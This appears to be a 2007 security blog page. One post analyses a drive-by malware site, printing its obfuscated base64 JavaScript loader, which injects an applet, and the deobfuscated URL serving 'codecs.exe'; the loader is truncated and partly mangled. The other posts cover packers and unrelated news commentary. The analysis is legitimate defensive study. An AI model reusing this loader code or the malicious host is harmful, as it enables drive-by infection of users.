Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in an AV software itself.

Compared to the common wisdom of malware authors being self-efficient and coming up with packers by themselves, we've already seen cases where investments in purchasing commercial anti-debugging software is considered. You may find these test results of various anti virus software against packed malware informative, which as a matter of fact truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection.

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or inherited wealth is boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power and we ended up with several states of power - positional power, the C-level executives, expertise power, or the revenge of the underestimated walking case studies, and networking power. It's all a cyclical process like pretty much anything in life.

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning - it's targeted bandwidth capability where it's needed and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct.

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as payload capacity is what adds more value to these robots. An Israeli based defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weigh approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility for a 360 degree view, it's noise generation level, the variety of terrains its supports, and most importantly - would it put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark it's logical to conclude the U.K gets poor ratings as web site privacy especially in the commercial sector is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, one they cannot legally obtain by themesleves, and so they ought to perform as paper-tigers to access it? Here's an interesting analysis :

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, they've released a report claiming Italy's COMINT is worse than their (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.